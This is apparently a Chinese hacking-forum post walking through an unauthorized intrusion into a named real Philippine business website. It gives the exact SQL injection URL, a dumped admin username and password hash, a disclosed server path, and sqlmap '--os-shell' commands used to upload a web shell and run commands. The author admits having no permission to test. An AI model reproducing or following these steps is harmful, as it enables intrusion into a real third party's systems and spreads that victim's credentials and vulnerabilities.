关于我的思路 大牛勿喷 分享 快乐加倍 忧伤减半
李菊福:
一、信息收集
①whois查询
由于这个域名是境外 whois查询有些问题 一般情况下都能正常查询
②利用谷歌插件直接显示出网站其中一小部分信息
图1
③查询网站开启哪些服务
本屌使用nmap没扫出来 于是到站长工具里扫描一下
扫描结果就只看到一个默认80端口 蛋蛋的忧伤…
但是也不能全相信眼睛
不知道不代表不发生 随着情况的变化而变化 就像我这么帅的帅哥来渗透这个站
站长觉得倍儿有面子指不定全给默认弱口令了 哈哈哈T.T
二、分析情报
①从上面收集的信息来看 了解到程序是用的php 环境是阿帕奇 搭建在windows 2003中
三、找注入、找后台、找敏感信息
①屌丝的自我修养之:爬网站
能爬网站的工具很多 不一一列举
我这里使用WebRobot.exe
比较方便 个人感觉!
过程有一点慢 取决于自己的网络条件和耐心了
注入点
www.bayanbusiness.com.ph/news.php?article=71
直接在网址后面加admin\ststem\administrator\login\manger 有时候会自动跳出登陆界面 纯属个人收集
列目录了…..意淫中…
蹦!直接爆出路径 其实也没有可以去找 就是点了点蜘蛛爬出来的数据 看看是否存在 细心的过程…
D:\bayanbusiness.com.ph\download.php
还跑出来一些邮件箱信息
实战思路一
既然有了注入点….不会再多说了!sqlmap!
先查询下一共多少数据库把
吓尿屌丝….
这个sqlmap跑数据就省略把 就那几个语句 灵活运用就好 鉴于大家都跑了很多表出来 找数据也找了半天
但是最后md5解不了密 不会再爱了!!
| user_name | user_pass |
+———–+———————————-+
| xmgr | ec9b8bc68faf43eec8dbd2b54a298f5b |
蚂蚁大牛跑出来了 解不了密你tm说个屁
思路一失败!
思路二:目录中寻找答案 既然能列目录 直接查看上一级上一级 这个还是省略吧 我自己没找到什么好东西
不代表你找不到好东西 应该是我的环境问题
思路三:
直接开搞把 也没有测试权限 不过sql能跑出数据 一般权限都不低把
语句1:sqlmap.py -u www.bayanbusiness.com.ph/news.php?article=71 –os-shell
下面就可以看看这边文章 雪狼大牛发出来的所 渣渣
http://www.2cto.com/Article/201211/167325.html 壮载我大红黑联盟
默认PHP就好了
语句2:3
这句话的意思是无法检索Web服务器的文档根目录 意思就是填写web根目录 刚才爆出来的路径有用了
语句3:D:\bayanbusiness.com.ph
无视 直接回车
不懂得话翻译翻译
成功上传 还有一个页面
http://www.bayanbusiness.com.ph:80/tmpufbtn.php 访问一下
上传成功后www.bayanbusiness.com.ph/1.php
直接用刚才的osshell执行命令 ok!
小结:
只是单纯的拿下了一遍再做了一遍 运气好 满招损 谦受益 希望大家学有所成!百年修得同船渡 !
十年后我还会怀念这里 那一年 饿着肚子望着你的脸 美好的回忆就像伤口不忍揭开 祝愿逝去的青春能被怀念
你是不是那种渗透特别厉害的人 永远有比我更菜的脚本小子 所以我不敢这样认为
我觉得渗透的时候就像喝了很多冰啤酒 在几小时后化为瞌睡虫…
离开你第一天 想你….